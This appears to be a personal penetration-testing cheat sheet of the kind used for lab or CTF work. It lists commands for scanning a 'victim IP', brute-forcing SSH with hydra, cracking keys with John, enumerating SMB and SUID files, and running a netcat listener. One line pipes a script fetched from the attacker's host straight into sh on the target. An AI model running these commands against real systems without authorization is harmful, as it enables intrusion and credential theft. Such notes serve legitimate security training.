# Cheet Sheet

---

Replace MIP with the victim IP
Replace MyIP with my own IP

---

## Scanning from my computer

---

### nmap

- standart scan with vulnarbility scan: sudo nmap -sC -sV -vvv --script vuln $MIP -oN nmap/results
- Faster scan (without vuulnarbility scan): sudo nmap -sC -sV -vvv $MIP -oN nmap/results
- All port scan: sudo nmap -sC -sV -vvv -p- $MIP -oN nmap/results

### rustscan

- Needs To Be Installed first

### Gobuster

- gobuster dir -u <http://MIP:Port> -o gobuster/dirs -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 100

### Enum4linux

- enum4linux -a $MIP >> enum4linux/results

---

## scanning localy

---

---

## Opening a small web server

---

- python -m http.server port_number (don't have to give port number)

---

## Cracking passwords

---

### JohnTheRipper

- Convert the ssh key to be cracked by john: ssh2john.py privat_key_file > ~hash_file_for_john.hash
- Run John: sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash_file_for_john.hash

### hydra

- hydra -L User_list -P /usr/share/wordlists/rockyou.txt ssh://$MIP -o scans/local/hydra/working\ creds -u -v

---

## Running a script on target machine after sshing

---

- curl <http://MyIP:port/file.sh> | sh

---

## Connecting to smb share

---

- smbclient -I=MIP -L -U /Anonymos
  
---

## Connecting to RDP

---

- xfreerdp /v:MIP /u:User_name

---

## Stegnography

---

- Hide in photo: steghide -ef path_to_file_needed_to_be_hidden -cf path_to_file_to_hide_inside -sf output_file_name-optional -z compression_level_from_1_to_9-If_capital_no_compression_will_be_used -e ecription_type-can_be_none_or_any_seported_encrition-If_omited_then_deafults_to-128bit_AES
- Get the hidden file: steghide extract -sf stegoFile -xf outputFile

---

## Netcat

---

- nc -lnvp port

---

## Usful after getting access

---

- List sudo privliges: sudo -l
- find all files owned by the user: find dir_name -user User_name -type f 2>>/dev/null (dir_name is often "/")
- Serch for on web interface: robots.txt, sitemap.xml
- If you find private ssh key - change the file permissions to 400

---

## Get String from a file

---

- strings file

---

## Save output to file

---

- command > outputfile
- command | tee outputfile

---

## View and edit hex of file

---

- hexeditor file

---

## Find Command

---

- Command build: find where what
- find all files with SUID set: find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

---

## Terminator

---

- ctrl+shift+o -> split horizontally
- ctrl+shift+e -> split vertically

---

## hashcat examples

---

- use '--example-hashes'

---
